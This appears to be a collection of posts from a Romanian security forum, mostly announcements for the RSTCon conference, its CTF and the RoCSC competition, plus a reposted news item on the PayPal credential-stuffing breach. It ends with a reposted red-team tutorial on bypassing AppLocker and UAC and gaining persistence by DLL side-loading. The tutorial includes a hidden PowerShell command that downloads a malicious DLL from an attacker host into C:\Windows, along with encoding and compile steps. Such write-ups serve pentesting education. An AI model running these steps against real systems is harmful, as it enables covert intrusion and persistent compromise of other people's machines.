Nytro

Pregatiti? La 10:00 incepe https://rstcon.com/

3$ / ora, mai bine ca angajati la Mc. PS: Mai degraba vezi cum comunica jocul cu serverul si automatizezi procesul.

START ÎNSCRIERI pentru Romanian Cyber Security Challenge – RoCSC 2023: https://www.rocsc.ro/ #RoCSC este Campionatul Național de Securitate Cibernetică, o competiție de tip CTF (capture the flag) desfășurată în două stagii la nivel național și, totodată, procesul oficial de selecție a echipei României - #TeamRomania - pentru European Cyber Security Challenge (Campionatul European de Securitate Cibernetică), ce va avea loc în acest an în luna octombrie în Norvegia (24-27.10.2023). Participarea este GRATUITĂ, iar tinerii pasionați de domeniul securității cibernetice își vor putea demonstra, la nivel național, abilitățile în domenii precum mobile & web security, crypto, reverse engineering și forensics. Concurenții se vor întrece pe 3 categorii de concurs: Juniori (16-21 de ani), Seniori (22-25 de ani) și Open (disponibil indiferent de vârstă). Mai mult, la categoriile eligibile pentru selecție (Juniori și Seniori) se vor acorda premii în bani (locurile 1-3), respectiv premii speciale (locurile 4-10). DEADLINE pentru înregistrare: 27 Mai 2023 Etapa preliminară de calificare va avea loc online, în perioada 26.05 ora 16:00 - 27.05 ora 24:00 (32 ore) Finala ROCSC23 se va desfășura on-site, la Bucuresti, în perioada 22-23.07.2023

RSTCon #3 se va desfasura la finalul acestei saptamani pe 27 si 28 aprilie 2023 de la 10:00 la 17:00 iar concursul CTF va avea loc de pe 29 aprilie 2023 ora 10:00 până pe 30 aprilie 2023 la ora 17:00. - Lista prezentarilor: https://lnkd.in/dbVbypGd - Platforma CTF: https://ctf.rstcon.com/ - Event: https://lnkd.in/daRccaj6 Pentru mai multe detalii: https://rstcon.com/ Like, share and subscribe 🤗

Interesant, mi-a scapat asta insa sunt familiar cu https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/

Din acest motiv facem RSTCon, incercam... Nu stiu daca se poate face un astfel de top, in prezent problema se pune "cine plateste mai mult". Mai exact, daca firmele si guvernele platesc oamenii bine, poate sa iasa research frumos insa cel mai adesea e "secret" (e.g. Snowden). Din punctul meu de vedere SUA si China sunt foarte implicate, dar am vazut tot mai multe despre Coreea de Nord. Nu am idee despre Rusia, in trecut faceau treburi, in prezent probabil nu mai sunt asa "implicati". Asta ma intreb si eu, nu stiu ce se intampla, nu stiu ce fac tinerii din ziua de azi. Politehnica Bucuresti scotea oameni buni cu Security Summer School dar parca nici de acolo nu mai apar prea multi. Eu am fost implicat in ECSC si parca nu prea avem Juniori, nu stiu, poate s-au apucat toti de programare...

Din punctul meu de vedere o carte e ideala ca sa inveti limbajul. Cat despre compilare, un tutorial ar trebui sa fie de ajuns ca sa intelegi sa folosesti un IDE. Poti folosi si tutoriale video, dar cauta unele "complete", care sa acopera subiectul cat mai detaliat. Incearca platformele Udemy, Pluralsight sau altele, desi costa ceva, nu consider ca e vorba de un pret mare.

Inca ceva referitor la Discord-ul conferintei: NU este Discord-ul RST. Nu stiu ce faceti acolo si nu ma intereseaza, dar conferinta si CTF-ul sunt serioase, pentru cei interesati, asa ca daca nu aveti ce face gasiti alte activitati in loc sa injurati pe acel Discord si sa faceti caterinca ieftina.

Lista prezentarilor a fost actualizata. Nu uitati de CTF, ne-ar prinde bine niste exercitii de la voi.

Lista preliminara a prezentarilor a fost publicata, se poate modifica: https://rstcon.com/prezentari/ Daca exista persoane dornice sa creeze challenges pentru CTF, astept un semn.

Armand Iliescu „Eroii necunoscuți” ai comerțului online: Visa a emis peste 100 de milioane de tokenuri În domeniul plăților, tokenurile înlocuiesc datele cardului și le transformă într-un cod care nu poate fi descifrat. Fiecare token este unic, astfel că nu poate fi spart sau exploatat de infractorii cibernetici, protejând în acest mod detaliile de plată. Tokenurile sunt generate automat, spre exemplu atunci când un utilizator își salvează datele de card într-o platformă de streaming, la un magazin online sau în portofelul digital de pe smartphone. Pot exista mai multe tokenuri generate pentru același card - fiecare dintre ele are asociat un număr unic și poate fi folosit exclusiv pe aplicația sau dispozitivul în care este stocat. Acesta este unul dintre motivele pentru care Visa Token Service (VTS) a emis mai mult de 100 de milioane de tokenuri în Europa Centrală și de Est - un număr considerabil mai mare decât cel al cardurilor fizice Visa din regiune. Articol complet: https://www.wall-street.ro/special/ecomteam/296165/eroii-necunoscuti-ai-comertului-online-visa-a-emis-peste-100-de-milioane-de-tokenuri.html?

Ultima saptamana in care cei care vor sa prezinte se pot inscrie: https://rstcon.com/call-for-papers/

Se mai ofera cineva sa ajute cu challenges?

Call for Papers e inca deschis pentru cine vrea sa prezinte: https://rstcon.com/call-for-papers/

Silmarillion

Cea mai simpla solutie: nu faci mizerii si nu e nevoie sa te anonimizezi.

Asteptam propuneri de exercitii pentru CTF de la voi: https://ctf.rstcon.com/

Am acutalizat link-ul pentru Discord: https://discord.gg/NEkCQHhZHQ Asteptam propuneri de la voi pentru prezentari: https://rstcon.com/call-for-papers/ Thanks @Zatarra pentru donatia consistenta.

Platforma pentru CTF este disponibilă. Înregistrările sunt deschise: https://ctf.rstcon.com/ Premiile pentru concurs: Locul I 4000 RON Locul II 2000 RON Locul III 1000 RON Cel mai bun write-up 500 RON Premiile sunt oferite din donații de la membrii comunității. Cei care ne pot ajuta cu o donație sunt rugați să ne contacteze la contact@rstcon.com. Astfel există posibilitatea ca valoarea premiilor să fie mai mare. De asemenea, dacă doriți să ne sprijiniți prin crearea unor exerciții CTF, indiferent de gradul de dificultate sau de tematica abordată, așteptăm un email la contact@rstcon.com. Pentru discuții referitoare la CTF vom folosi canalul #ctf de pe Discord. Prezentarea rezultatelor concursului va avea loc la ora 16:00 pe Discord. Informatii complete: https://rstcon.com/ctf/ Revin cu detalii.

RST Con este o conferință online, gratuită, în limba română, adusă la viață de către comunitatea RST. Conferința va avea loc pe 27-28 aprilie 2023 de la 10:00 la 17:00 iar concursul CTF va avea loc de pe 29 aprilie 2023 ora 10:00 până pe 30 aprilie 2023 la ora 17:00. Conferința se va desfășura folosind platforma Zoom. Înregistrarea și accesarea evenimentului este disponibilă la următoarea adresă: RSTCon #3 – 27 aprilie – Ziua I: https://us02web.zoom.us/webinar/register/WN_xKDZ0iklTjWeWcaH34VNsQ RSTCon #3 – 28 aprilie – Ziua II: https://us02web.zoom.us/webinar/register/WN_0Y7IwXCjR4-U1Fcvyj4R9w Vă rugăm să rețineți că evenimentele Zoom sunt diferite în cele două zile. Linkedin: https://www.linkedin.com/events/rstcon-37035364565479473152/about/ Informatii complete pe https://rstcon.com/ Revin cu informatii.

Eu am 3 doze de vaccin si din cauza lui am murit de vreo 2 ori.

Nice, in teorie puteai sa il duci in RCE, dar probabil au tot bagat mitigations. Sa ne zici cat dau pe el.

https://9gag.com/gag/a4oEMp1

PayPal accounts breached in large-scale credential stuffing attack By Bill Toulas January 19, 2023 PayPal is sending out data breach notifications to thousands of users who had their accounts accessed through credential stuffing attacks that exposed some personal data. Credential stuffing are attacks where hackers attempt to access an account by trying out username and password pairs sourced from data leaks on various websites. This type of attack relies on an automated approach with bots running lists of credentials to "stuff" into login portals for various services. Credential stuffing targets users that employ the same password for multiple online accounts, which is known as "password recycling." Close to 35,000 users impacted PayPal explain that the credential stuffing attack occurred between December 6 and December 8, 2022. The company detected and mitigated it at the time but also started an internal investigation to find out how the hackers obtained access to the accounts. By December 20, 2022, PayPal concluded its investigation, confirming that unauthorized third parties logged into the accounts with valid credentials. The electronic payments platform claims that this was not due to a breach on its systems and has no evidence that the user credentials were obtained directly from them. According to the data breach reporting from PayPal, 34,942 of its users have been impacted by the incident. During the two days, hackers had access to account holders' full names, dates of birth, postal addresses, social security numbers, and individual tax identification numbers. Transaction histories, connected credit or debit card details, and PayPal invoicing data are also accessible on PayPal accounts. PayPal says it took timely action to limit the intruders' access to the platform and reset the passwords of accounts confirmed to have been breached. Also, the notification claims that the attackers have not attempted or did not manage to perform any transactions from the breached PayPal accounts. "We have no information suggesting that any of your personal information was misused as a result of this incident, or that there are any unauthorized transactions on your account," reads PayPal's notification to impacted users. "We reset the passwords of the affected PayPal accounts and implemented enhanced security controls that will require you to establish a new password the next time you log in to your account" - PayPal Impacted users will receive a free-of-charge two-year identity monitoring service from Equifax. The company strongly recommends that recipients of the notices change the passwords for other online accounts using a unique and long string. Typically, a good password is at least 12-characters long and includes alphanumeric characters and symbols. Moreover, PayPal advises users to activate two-factor authentication (2FA) protection from the 'Account Settings' menu, which can prevent an unauthorized party from accessing an account, even if they have a valid username and password. Sursa: https://www.bleepingcomputer.com/news/security/paypal-accounts-breached-in-large-scale-credential-stuffing-attack/

assume-breach Jan 20 Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. In this installment, we’re going to bypass UAC and gain administrative persistence on a target without dropping EXEs to disk. Pretty cool, right? Getting Started If you haven’t read my previous post, you can find it here: Bypassing Applocker Using LNK Files. That post is going to show you how to set up your Powershell scripts, LNK file and so forth for initial access to the target. Since we still have access to our target, we’re going to start where we ended in our last article. Here’s the scenario: We have an administrative beacon in medium integrity through Havoc C2. You’ll notice that the process is Powershell. If we had used process injection in our shellcode dropper, we would have migrated to a different process like Explorer.exe or ApplicationFrameHost.exe (just something to think about). Running a “whoami” we see that our user, david, is part of the administrators group. In order for our persistence method to work, we need local admin. The reason being that we need access to “C:\Windows\” and this isn’t accessible to domain users or administrators unless we are in a high integrity beacon/process. So since this user is an admin, we can perform a UAC bypass. For this task, I prefer to use my own tool, HighBorn. HighBorn utilizes the Windows mock directory vulnerability to side load a DLL and execute it in high integrity. Using A UAC Bypass To Perform Administrative Actions A typical UAC Bypass is performed to get a high integrity beacon back to a C2. However, we can use HighBorn to perform administrative tasks on execution instead of getting a high integrity beacon. Let’s discuss the typical UAC Bypass to get a beacon back to Havoc. This is the usual workflow: Target downloads malicious EXE . 2. We run HighBorn in memory using inline-execute. 3. HighBorn performs the UAC Bypass and calls the EXE in high integrity. 4. We get a high integrity beacon. Since we are bypassing Applocker protections, we don’t have a dropper on disk. Remember, our beacon is running through a Powershell process. The UAC Bypass performs administrative code execution so we can tailor this to our needs. Since our need for this POC is persistence, we can change our execution from calling a malicious EXE to downloading a malicious DLL. DLL Side Loading For Persistence I’ve seen a few posts on this, mainly on LinkedIn, but there is a pretty popular DLL side loading vulnerability in Windows File Explorer. If you craft a malicious DLL and name it cscapi.dll, you can place it in C:\Windows\ and it will get executed when the user logs in. The caveat to this is that you must have local admin privileges to gain access to C:\Windows\. So let’s begin by creating a malicious DLL. Creating The Malicious DLL To create a malicious DLL, I prefer to use my own tool, Harriet. We choose option 2 to create our DLL. We then choose option 1 (the only option for now) and then we input all of our values. I chose to inject into Explorer.exe (you might want to change this process if you’re on a real pentest) and I named my DLL appropriately for the exploit. Modifying HighBorn.cs For Administrative Actions Now we need to craft a command to call out to cscapi.dll and download it into C:\Windows\. This is where HighBorn comes in. I navigate to the HighBorn folder and edit the HighBorn.c file. As you can see from the screenshot, this is a very simple DLL. We can use a easy Powershell command to download our cscapi.dll file into the Windows folder. powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’ However, if we try to compile this, we get escape sequence errors. Let’s encode our command into Base64 using Powershell. $str= “powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’ [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) Now we should have a good Base64 string. Let’s add it to HighBorn.c file. We then compile it per the command in the ReadMe.md file in the HighBorn folder. x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl, — subsystem,windows Now we have a secur32.dll file. In the HighBorn.cs file, we modify the exploit to put our IP and port to pull secur32.dll. Then we can compile HighBorn.exe with this command. mcs HighBorn.cs /out:HighBorn.exe We host secur32.dll and run our command in Havoc. On our python server, we see it pull secur32.dll and then it pulls our cscapi.dll file! Moving to our Windows folder on the target, we see that it has our DLL in place. Now remember, our cscapi.dll is a malicious DLL that will inject shellcode into Explorer.exe on login. Let’s reboot the target and see if we get a shellback. If all goes well, we should get a beacon in the Explorer.exe process on Havoc. And as user david logs in, we have our beacon! Pretty cool persistence technique! The biggest con to this technique is that you need admin privileges. However, if you can crack an admin password you can perform this technique on any user’s system for persistence on multiple workstations in the environment without having to drop an EXE to disk. Hopefully you found this article helpful or at least interesting. If you like my content you can follow me on here or on Twitter @assume_breach Sursa: https://assume-breach.medium.com/home-grown-red-team-bypassing-applocker-uac-and-getting-administrative-persistence-88b85c81343e